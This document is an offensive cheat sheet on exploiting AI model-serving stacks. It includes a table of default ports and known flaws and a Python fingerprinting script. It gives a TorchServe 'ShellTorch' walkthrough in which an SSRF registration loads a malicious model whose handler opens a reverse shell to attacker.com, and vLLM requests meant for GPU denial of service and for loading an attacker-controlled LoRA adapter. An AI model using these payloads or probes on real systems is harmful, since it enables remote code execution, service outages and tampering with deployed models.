Model Serving Exploits

Common Serving Stacks & Their Vulns

Stack            | Default Port    | Auth Default | Known Issues
Ollama           | 11434           | None         | Open API, RCE via model pull
vLLM             | 8000            | None         | OpenAI-compatible, unauthenticated by default
TorchServe       | 8080/8081       | None         | Management API exposed, model file RCE
Triton           | 8000/8001/8002  | None         | gRPC + HTTP, model repo traversal
text-gen-webui   | 7860            | Optional     | API mode exposes model, file system access
LocalAI          | 8080            | None         | OpenAI-compatible wrapper, full API exposure
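
The default endpoints above make these stacks easy to fingerprint. Below is a minimal probing sketch (plain Python plus the requests library); the target address is a placeholder and the paths are the stock health/listing routes, so adjust for non-default deployments.

# fingerprint_serving.py: probe default ports for stack-specific endpoints (authorized testing only)
import requests

TARGET = "10.0.0.5"  # placeholder host

PROBES = [
    ("Ollama",          11434, "/api/tags"),         # lists pulled models when the API is open
    ("vLLM",             8000, "/v1/models"),        # OpenAI-compatible model listing
    ("LocalAI",          8080, "/v1/models"),
    ("TorchServe",       8080, "/ping"),             # inference API health check
    ("TorchServe mgmt",  8081, "/models"),           # management API, should never be internet-facing
    ("Triton",           8000, "/v2/health/ready"),  # KServe v2 health endpoint
    ("text-gen-webui",   7860, "/"),                 # Gradio UI
]

for name, port, path in PROBES:
    url = f"http://{TARGET}:{port}{path}"
    try:
        r = requests.get(url, timeout=3)
        print(f"[{r.status_code}] {name:15} {url}")
    except requests.RequestException:
        pass  # port closed or filtered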

TorchServe Exploitation (CVE-2023-43654)

# TorchServe Management API (port 8081) - SSRF leading to RCE
# CVE-2023-43654 - "ShellTorch"
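
Exposure is easy to confirm first: an unauthenticated model listing against the management port returning 200 with a JSON list means the register/scale/delete endpoints are open as well. A minimal check, with a placeholder host:

# check_torchserve_mgmt.py: is the management API reachable without credentials?
import requests

TARGET = "10.0.0.5"  # placeholder host
r = requests.get(f"http://{TARGET}:8081/models", timeout=5)
# 200 plus a JSON model list means model registration (the SSRF below) is reachable unauthenticated
print(r.status_code, r.text)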

# Step 1: SSRF via the "url" query parameter of the model registration API
# (the management API fetches whatever URL it is given and loads the result as a model)
POST http://target:8081/models?url=http://attacker.com/malicious.mar&model_name=pwned&initial_workers=1

# Step 2: The malicious .mar file contains arbitrary Python
# executed by TorchServe during model loading

# Step 3: Python code in the MAR handler runs on the TorchServe host:
# handler.py (malicious) - module-level code executes as soon as the handler is imported
import os
os.system("bash -i >& /dev/tcp/attacker.com/4444 0>&1")  # reverse shell back to the attacker

vLLM Configuration Attacks

# vLLM exposes an OpenAI-compatible API
# No authentication unless the server was started with --api-key

# List available models
GET http://target:8000/v1/models
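
Whether a key is enforced (vLLM's --api-key option) shows up in the same call: an unauthenticated GET to /v1/models returns 401 when a key is required and the model list otherwise. A small sketch with a placeholder host:

# check_vllm_auth.py: does /v1/models answer without an Authorization header?
import requests

TARGET = "10.0.0.5"  # placeholder host
r = requests.get(f"http://{TARGET}:8000/v1/models", timeout=5)
if r.status_code == 200:
    print("open:", [m["id"] for m in r.json().get("data", [])])
else:
    print("auth enforced or error, status:", r.status_code)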

# Query with custom sampling params (resource exhaustion)
POST http://target:8000/v1/completions
{
  "model": "llama-3-70b",
  "prompt": "Write a very long story",
  "max_tokens": 32000,         # max tokens β†’ GPU resource exhaustion
  "n": 100                     # 100 parallel completions β†’ DoS
}
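
How expensive such a request is for a given deployment can be gauged with a single timed completion; the sketch below reuses the placeholder host and model name and deliberately keeps max_tokens modest.

# time_completion.py: measure the cost of one large completion (authorized testing only)
import time
import requests

TARGET = "10.0.0.5"                    # placeholder host
payload = {
    "model": "llama-3-70b",            # whatever GET /v1/models reported
    "prompt": "Write a very long story",
    "max_tokens": 4096,                # keep this modest on shared infrastructure
}
start = time.time()
r = requests.post(f"http://{TARGET}:8000/v1/completions", json=payload, timeout=600)
usage = r.json().get("usage", {})
print(f"status={r.status_code} completion_tokens={usage.get('completion_tokens')} elapsed={time.time() - start:.1f}s")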

# Dynamic LoRA adapter loading (if VLLM_ALLOW_RUNTIME_LORA_UPDATING is enabled)
POST http://target:8000/v1/load_lora_adapter
{
  "lora_name": "attacker-lora",
  "lora_path": "/path/reachable/by/the/server"   # ← attacker-controlled adapter weights
}

# Once loaded, the adapter appears in GET /v1/models and is selected
# per request via the "model" field